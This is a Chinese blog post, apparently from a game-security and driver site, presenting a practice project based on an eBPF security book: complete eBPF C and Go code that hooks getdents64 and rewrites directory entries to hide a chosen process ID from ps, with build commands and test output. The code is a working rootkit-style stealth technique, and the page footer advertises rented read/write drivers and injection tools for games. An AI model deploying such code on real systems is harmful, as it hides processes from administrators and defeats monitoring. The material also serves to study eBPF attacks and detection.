首页课程文章
无痕注入APC注入线程注入读写驱动注入技术句柄表进程线程系统调用保护模式内存管理远程CALL软件调试驱动封装云下发驱动开发FPS数据方框透视FPS方框FPS自瞄CED3DHOOKD3D绘制Imgui绘制DWM
内核课程驱动出租学习路线聊天室免责声明提问技巧

编程技术-基于eBPF的进程隐藏技术

推荐 原创

周杰伦

文章分类编程技术阅读数 : 26阅读时长 : 9分钟


【编程技术-基于eBPF的进程隐藏技术】此文章归类为:编程技术。

这是一个练习项目,主要是针对《eBPF云原生安全:原理与实践》的chapter14的hide-pid的代码实践,仅修改了指定pid的小部分代码。最终实现了通过-p参数指定想要隐藏的进程号,在执行ps -ef的时候无法观察到被隐藏的进程。

实验环境

操作系统版本

1
2
3
4
Ubuntu 22.04.3 LTS
 
# uname -a
Linux Jtian 5.15.167.4-microsoft-standard-WSL2 #1 SMP Tue Nov 5 00:21:55 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux

编译环境准备

1
2
3
4
5
6
7
8
9
10
11
12
13
git clone https://github.com/mozillazg/cloud-native-security-with-ebpf.git
 
https://github.com/libbpf/bpftool/releases/download/v7.5.0/bpftool-v7.5.0-amd64.tar.gz
tar xvf bpftool-v7.5.0-amd64.tar.gz
cp bpftool /usr/bin
 
apt-get update
apt-get install libelf-dev
apt-get install clang
 
apt-get install golang-1.23-go
ln -s /usr/lib/go-1.23/bin/go go
go env -w GOPROXY=https://goproxy.cn,direct

hide-pid-p主要代码

参考cloud-native-security-with-ebpf/chapter14/hide-pid代码,只修改了main.go获取pid的部分代码,使得可以通过-p参数可以隐藏指定的进程。

main.bpf.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>
#include <bpf/bpf_core_read.h>
#include "main.h"
 
struct {
    __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
    __uint(key_size, sizeof(u32));
    __uint(value_size, sizeof(u32));
} events SEC(".maps");
 
struct {
    __uint(type, BPF_MAP_TYPE_LRU_HASH);
    __uint(max_entries, 2048);
    __type(key, u64);
    __type(value, long unsigned int);
} dirp_map SEC(".maps");
 
static const volatile struct config_t configs;
 
SEC("tracepoint/syscalls/sys_enter_getdents64")
int tracepoint_syscalls__sys_enter_getdents64(struct trace_event_raw_sys_enter *ctx) {
    u64 tid = bpf_get_current_pid_tgid();
 
    struct linux_dirent64 *dirp = (struct linux_dirent64 *)BPF_CORE_READ(ctx, args[1]);
 
    bpf_map_update_elem(&dirp_map, &tid, &dirp, BPF_ANY);
    return 0;
}
 
SEC("tracepoint/syscalls/sys_exit_getdents64")
int tracepoint_syscalls__sys_exit_getdents64(struct trace_event_raw_sys_exit *ctx) {
    struct event_t event = { 0 };
    u64 tid = bpf_get_current_pid_tgid();
    int total_bytes_read = BPF_CORE_READ(ctx, ret);
    if (total_bytes_read <= 0) {
        return 0;
    }
    long unsigned int *pp = bpf_map_lookup_elem(&dirp_map, &tid);
    if (!pp) {
        return 0;
    }
    char to_hide_pid[MAX_NAME];
    #pragma unroll
    for (int i = 0; i < MAX_NAME; i++) {
        to_hide_pid[i] = configs.to_hide_pid[i];
        if (to_hide_pid[i] == '\0') {
            break;
        }
    }
 
    bool overwrite = false;
    int overwrite_ret = 0;
 
    //
    struct linux_dirent64 *pre_dirent_start = (struct linux_dirent64*)*pp;
    struct linux_dirent64 *current_dirent_start;
    char current_dir[MAX_NAME] = {};
    //
    short unsigned int pre_reclen = 0;
    short unsigned int current_reclen = 0;
    short unsigned int overwrite_reclen = 0;
    int current_total = 0;
 
    #pragma unroll
    for (int i = 0; i < 1024; i++) {
        // 通过指针操作获取当前 struct linux_dirent64 实例
        current_dirent_start = (struct linux_dirent64*)((void *)pre_dirent_start + pre_reclen);
        // 读取 d_name 和 d_reclen 字段的值
        bpf_probe_read_user(&current_dir, sizeof(current_dir), (char *)current_dirent_start->d_name);
        bpf_probe_read_user(&current_reclen, sizeof(current_reclen), (void *)&current_dirent_start->d_reclen);
 
        // 如果是待隐藏 pid 的目录
        if (str_eq(current_dir, to_hide_pid, MAX_NAME)) {
            // 修改上一个示例的 reclen 字段长度,让它覆盖当前实例长度,达到跳过当前实例的目的,结果就是从 ps 结果中隐藏了该 pid
            overwrite_reclen = pre_reclen + current_reclen;
            overwrite_ret = bpf_probe_write_user(&pre_dirent_start->d_reclen, &overwrite_reclen, sizeof(overwrite_reclen));
            overwrite = true;
            break;
        }
 
        // 防止内存越界
        current_total += current_reclen;
        if (current_total >= total_bytes_read) {
            break;
        }
 
        // 处理下一个实例
        pre_reclen = current_reclen;
        pre_dirent_start = current_dirent_start;
    }
 
    if (!overwrite) {
        return 0;
    }
 
 
    event.pid = bpf_get_current_pid_tgid() >> 32;
    event.ret = overwrite_ret;
    #pragma unroll
    for (int i = 0; i < MAX_NAME; i++) {
        event.hidden_pid[i] = configs.to_hide_pid[i];
        if (event.hidden_pid[i] == '\0') {
            break;
        }
    }
    bpf_get_current_comm(&event.comm, sizeof(event.comm));
 
    bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, &event, sizeof(struct event_t));
 
    return 0;
}
 
 
char _license[] SEC("license") = "GPL";

main.go

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
package main
 
import (
    "flag"
    "bytes"
    "context"
    "encoding/binary"
    "fmt"
    "log"
    "os"
    "os/signal"
    "syscall"
 
    bpf "github.com/aquasecurity/libbpfgo"
)
 
type Event struct {
    Pid       uint32
    Ret       uint32
    HiddenPid [8]byte
    Comm      [16]byte
}
 
type Config struct {
    ToHidePid [8]byte
}
 
func parseEvent(data []byte) (*Event, error) {
    var event Event
    err := binary.Read(bytes.NewBuffer(data), binary.LittleEndian, &event)
    if err != nil {
        return nil, err
    }
    return &event, nil
}
 
func main() {
    var err error
    defer func() {
        if err != nil {
            log.Fatalf("%+v", err)
        }
    }()
 
    /*
    pid := os.Getpid()
    log.Printf("pid: %d\n", pid)
    toHidePid := [8]byte{}
    bs := []byte(fmt.Sprintf("%d", pid))
    for i, v := range bs {
        toHidePid[i] = v
    }*/
 
    var pidStr string
    flag.StringVar(&pidStr, "p", "", "进程ID")
    flag.Parse()
 
    if pidStr == "" {
        fmt.Printf("Usage: %s -p pid\n\n", os.Args[0])
        return
    }
     
    var toHidePid [8]byte
    copy(toHidePid[:], pidStr)
 
    bpfModule, err := bpf.NewModuleFromFile("main.bpf.o")
    if err != nil {
        return
    }
    defer bpfModule.Close()
 
    config := Config{ToHidePid: toHidePid}
    if err = bpfModule.InitGlobalVariable("configs", config); err != nil {
        return
    }
 
    if err = bpfModule.BPFLoadObject(); err != nil {
        return
    }
    progIter := bpfModule.Iterator()
    for {
        prog := progIter.NextProgram()
        if prog == nil {
            break
        }
        _, err = prog.AttachGeneric()
        if err != nil {
            return
        }
    }
    log.Println("tracing...")
    eventsChannel := make(chan []byte)
    lostChannel := make(chan uint64)
    pb, err := bpfModule.InitPerfBuf("events", eventsChannel, lostChannel, 1024)
    if err != nil {
        return
    }
    //log.Printf("will hide pid %d", pid)
    ctx, stop := signal.NotifyContext(context.Background(), os.Interrupt, syscall.SIGTERM)
 
    pb.Start()
    defer func() {
        pb.Stop()
        pb.Close()
        stop()
    }()
 
loop:
    for {
        select {
        case data := <-eventsChannel:
            event, e := parseEvent(data)
            if e != nil {
                err = e
                return
            } else {
                log.Printf("pid: %d, comm: %s, hidden_pid: %s ret: %d",
                    event.Pid, event.Comm, event.HiddenPid, event.Ret)
            }
        case n := <-lostChannel:
            log.Printf("lost %d events", n)
        case <-ctx.Done():
            break loop
        }
    }
    log.Println("bye bye~")
}

编译

执行make build,生成 main 和 main.bpf.o 文件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p# make clean
make -C /root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src clean
rm -rf ./output
rm -rf vmlinux.h
rm -rf main
rm -rf main.bpf.o main.o
make[1]: Entering directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src'
  CLEAN
make[1]: Leaving directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src'
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p#
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p# ls
Makefile  README.md  main.bpf.c  main.go  main.h
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p#
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p# make build
make -C . main
make[1]: Entering directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p'
mkdir -p ./output/libbpf
CC="gcc" CFLAGS="-ggdb -gdwarf -O2 -Wall -fpie -Wno-unused-variable -Wno-unused-function" LD_FLAGS="" \
   make -C /root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src \
        BUILD_STATIC_ONLY=1 \
        OBJDIR=/root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf \
        DESTDIR=/root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output \
        INCLUDEDIR= LIBDIR= UAPIDIR= prefix= libdir= install
make -C /root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src UAPIDIR=/root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output install_uapi_headers
make[2]: Entering directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src'
  MKDIR    /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/bpf.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/btf.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/libbpf.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/libbpf_errno.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/netlink.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/nlattr.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/str_error.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/libbpf_probes.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/bpf_prog_linfo.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/btf_dump.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/hashmap.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/ringbuf.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/strset.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/linker.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/gen_loader.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/relo_core.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/usdt.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/zip.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/elf.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/features.o
  AR       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/libbpf.a
  INSTALL  bpf.h libbpf.h btf.h libbpf_common.h libbpf_legacy.h bpf_helpers.h bpf_helper_defs.h bpf_tracing.h bpf_endian.h bpf_core_read.h skel_internal.h libbpf_version.h usdt.bpf.h
  INSTALL  /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/libbpf.pc
  INSTALL  /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/libbpf.a
make[2]: Leaving directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src'
make[2]: Entering directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src'
  INSTALL  ../include/uapi/linux/bpf.h ../include/uapi/linux/bpf_common.h ../include/uapi/linux/btf.h
make[2]: Leaving directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src'
INFO: generating vmlinux.h from /sys/kernel/btf/vmlinux
clang -ggdb -gdwarf -O2 -Wall -fpie -Wno-unused-variable -Wno-unused-function -target bpf -D__TARGET_ARCH_x86 -I. -I./output -c main.bpf.c -o main.bpf.o
CC=clang \
        CGO_CFLAGS="-I/root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output" \
        CGO_LDFLAGS="-lelf -lz /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf.a" \
        GOARCH=amd64 \
        go build \
        -tags netgo -ldflags '-w -extldflags "-static"' \
        -o main ./main.go
make[1]: Leaving directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p'
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p#
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p#
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p# ls
Makefile  README.md  main  main.bpf.c  main.bpf.o  main.go  main.h  output  vmlinux.h
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p#

测试效果

随便启动一个python进程,并获得进程号pid

1
2
3
4
5
root@Jtian:~# python
Python 3.10.12 (main, Nov  6 2024, 20:22:13) [GCC 11.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>>
>>>

获得python的pid号为 119558

1
2
3
4
5
root@Jtian:~# ps -ef|grep python
root      119558    3209  0 19:27 pts/0    00:00:00 python
root      119741   90282  0 19:28 pts/2    00:00:00 grep --color=auto python
root@Jtian:~#
root@Jtian:~#

隐藏指定进程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p# ./main -p 119558
libbpf: loading main.bpf.o
libbpf: elf: section(3) tracepoint/syscalls/sys_enter_getdents64, size 176, link 0, flags 6, type=1
libbpf: sec 'tracepoint/syscalls/sys_enter_getdents64': found program 'tracepoint_syscalls__sys_enter_getdents64' at insn offset 0 (0 bytes), code size 22 insns (176 bytes)
libbpf: elf: section(4) .reltracepoint/syscalls/sys_enter_getdents64, size 16, link 30, flags 40, type=9
libbpf: elf: section(5) tracepoint/syscalls/sys_exit_getdents64, size 130472, link 0, flags 6, type=1
libbpf: sec 'tracepoint/syscalls/sys_exit_getdents64': found program 'tracepoint_syscalls__sys_exit_getdents64' at insn offset 0 (0 bytes), code size 16309 insns (130472 bytes)
libbpf: elf: section(6) .reltracepoint/syscalls/sys_exit_getdents64, size 160, link 30, flags 40, type=9
libbpf: elf: section(7) .maps, size 56, link 0, flags 3, type=1
libbpf: elf: section(8) .rodata, size 8, link 0, flags 2, type=1
libbpf: elf: section(9) license, size 4, link 0, flags 3, type=1
libbpf: license of main.bpf.o is GPL
libbpf: elf: section(20) .BTF, size 3677, link 0, flags 0, type=1
libbpf: elf: section(22) .BTF.ext, size 157068, link 0, flags 0, type=1
libbpf: elf: section(30) .symtab, size 6864, link 1, flags 0, type=2
libbpf: looking for externs among 286 symbols...
libbpf: collected 0 externs total
libbpf: map 'dirp_map': at sec_idx 7, offset 0.
libbpf: map 'dirp_map': found type = 9.
libbpf: map 'dirp_map': found key [8], sz = 8.
libbpf: map 'dirp_map': found value [12], sz = 8.
libbpf: map 'dirp_map': found max_entries = 2048.
libbpf: map 'events': at sec_idx 7, offset 32.
libbpf: map 'events': found type = 4.
libbpf: map 'events': found key_size = 4.
libbpf: map 'events': found value_size = 4.
libbpf: map 'main.rodata' (global data): at sec_idx 8, offset 0, flags 80.
libbpf: map 2 is "main.rodata"
libbpf: sec '.reltracepoint/syscalls/sys_enter_getdents64': collecting relocation for section(3) 'tracepoint/syscalls/sys_enter_getdents64'
libbpf: sec '.reltracepoint/syscalls/sys_enter_getdents64': relo #0: insn #16 against 'dirp_map'
....
libbpf: prog 'tracepoint_syscalls__sys_exit_getdents64': relo #512: patched insn #16188 (ALU/ALU64) imm 16 -> 16
libbpf: prog 'tracepoint_syscalls__sys_exit_getdents64': relo #513: <byte_off> [34] struct linux_dirent64.d_reclen (0:2 @ offset 16)
libbpf: prog 'tracepoint_syscalls__sys_exit_getdents64': relo #513: matching candidate #0 <byte_off> [36451] struct linux_dirent64.d_reclen (0:2 @ offset 16)
libbpf: prog 'tracepoint_syscalls__sys_exit_getdents64': relo #513: patched insn #16247 (ALU/ALU64) imm 16 -> 16
libbpf: map 'dirp_map': created successfully, fd=7
libbpf: map 'events': setting size to 32
libbpf: map 'events': created successfully, fd=8
libbpf: map 'main.rodata': created successfully, fd=9
2025/01/18 19:29:52 tracing...

观察进程隐藏效果 | 针对ps -ef有效,但针对ls -l /proc/xxx无效

针对ps -ef有效

1
2
3
root@Jtian:~# ps -ef|grep python
root      120545   90282  0 19:31 pts/2    00:00:00 grep --color=auto python
root@Jtian:~#

每次执行ps -ef,在进程隐藏的程序中也有打印出相应日志。

1
2
3
4
5
6
libbpf: map 'dirp_map': created successfully, fd=7
libbpf: map 'events': setting size to 32
libbpf: map 'events': created successfully, fd=8
libbpf: map 'main.rodata': created successfully, fd=9
2025/01/18 19:29:52 tracing...
2025/01/18 19:31:42 pid: 121264, comm: ps, hidden_pid: 119558 ret: 0

针对ls -l /proc/xxx无效

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
root@Jtian:~#
root@Jtian:~# ls -l /proc/119558
total 0
-r--r--r--  1 root root 0 Jan 18 19:37 arch_status
dr-xr-xr-x  2 root root 0 Jan 18 19:37 attr
-r--------  1 root root 0 Jan 18 19:37 auxv
-r--r--r--  1 root root 0 Jan 18 19:37 cgroup
--w-------  1 root root 0 Jan 18 19:37 clear_refs
-r--r--r--  1 root root 0 Jan 18 19:28 cmdline
-rw-r--r--  1 root root 0 Jan 18 19:37 comm
-rw-r--r--  1 root root 0 Jan 18 19:37 coredump_filter
-r--r--r--  1 root root 0 Jan 18 19:37 cpuset
lrwxrwxrwx  1 root root 0 Jan 18 19:37 cwd -> /root
-r--------  1 root root 0 Jan 18 19:37 environ
lrwxrwxrwx  1 root root 0 Jan 18 19:37 exe -> /usr/bin/python3.10
dr-x------  2 root root 0 Jan 18 19:37 fd
dr-xr-xr-x  2 root root 0 Jan 18 19:37 fdinfo
-rw-r--r--  1 root root 0 Jan 18 19:37 gid_map
-r--------  1 root root 0 Jan 18 19:37 io
-r--r--r--  1 root root 0 Jan 18 19:37 limits
-rw-r--r--  1 root root 0 Jan 18 19:37 loginuid
dr-x------  2 root root 0 Jan 18 19:37 map_files
-r--r--r--  1 root root 0 Jan 18 19:37 maps
-rw-------  1 root root 0 Jan 18 19:37 mem
-r--r--r--  1 root root 0 Jan 18 19:37 mountinfo
-r--r--r--  1 root root 0 Jan 18 19:37 mounts
-r--------  1 root root 0 Jan 18 19:37 mountstats
dr-xr-xr-x 65 root root 0 Jan 18 19:37 net
dr-x--x--x  2 root root 0 Jan 18 19:37 ns
-rw-r--r--  1 root root 0 Jan 18 19:37 oom_adj
-r--r--r--  1 root root 0 Jan 18 19:37 oom_score
-rw-r--r--  1 root root 0 Jan 18 19:37 oom_score_adj
-r--------  1 root root 0 Jan 18 19:37 pagemap
-r--------  1 root root 0 Jan 18 19:37 personality
-rw-r--r--  1 root root 0 Jan 18 19:37 projid_map
lrwxrwxrwx  1 root root 0 Jan 18 19:37 root -> /
-rw-r--r--  1 root root 0 Jan 18 19:37 sched
-r--r--r--  1 root root 0 Jan 18 19:37 schedstat
-r--r--r--  1 root root 0 Jan 18 19:37 sessionid
-rw-r--r--  1 root root 0 Jan 18 19:37 setgroups
-r--r--r--  1 root root 0 Jan 18 19:37 smaps
-r--r--r--  1 root root 0 Jan 18 19:37 smaps_rollup
-r--------  1 root root 0 Jan 18 19:37 stack
-r--r--r--  1 root root 0 Jan 18 19:28 stat
-r--r--r--  1 root root 0 Jan 18 19:37 statm
-r--r--r--  1 root root 0 Jan 18 19:28 status
-r--------  1 root root 0 Jan 18 19:37 syscall
dr-xr-xr-x  3 root root 0 Jan 18 19:37 task
-rw-r--r--  1 root root 0 Jan 18 19:37 timens_offsets
-r--r--r--  1 root root 0 Jan 18 19:37 timers
-rw-rw-rw-  1 root root 0 Jan 18 19:37 timerslack_ns
-rw-r--r--  1 root root 0 Jan 18 19:37 uid_map
-r--r--r--  1 root root 0 Jan 18 19:37 wchan
root@Jtian:~#

最后于 6小时前 被Jtian编辑 ,原因:


更多【编程技术-基于eBPF的进程隐藏技术】相关视频教程:www.yxfzedu.com




相关文章推荐

记录自己的技术轨迹
文章规则:
1):文章标题请尽量与文章内容相符
2):严禁色情、血腥、暴力
3):严禁发布任何形式的广告贴
4):严禁发表关于中国的政治类话题
5):严格遵守中国互联网法律法规
6):有侵权,疑问可发邮件至service@yxfzedu.com
近期原创 更多

Markdown Editor

友情链接
内核结构FAQ
免责声明
课程目录
Windows内核
游戏逆向(FPS)
技术交流QQ群
342478842215039827137189196
314055665159620936
www.yxfzedu.com是一个分享游戏安全,游戏外挂与反外挂,游戏驱动保护的视频网站!
接各种驱动定制如:游戏读写驱动,软件内存保护,防止调试等功能定制。
出租读写驱动,调试驱动,无痕注入支持各种游戏。
邮箱:service@yxfzedu.com
QQ:851920120
特别说明:不接游戏数据分析,外挂编写,登陆协议等类似业务。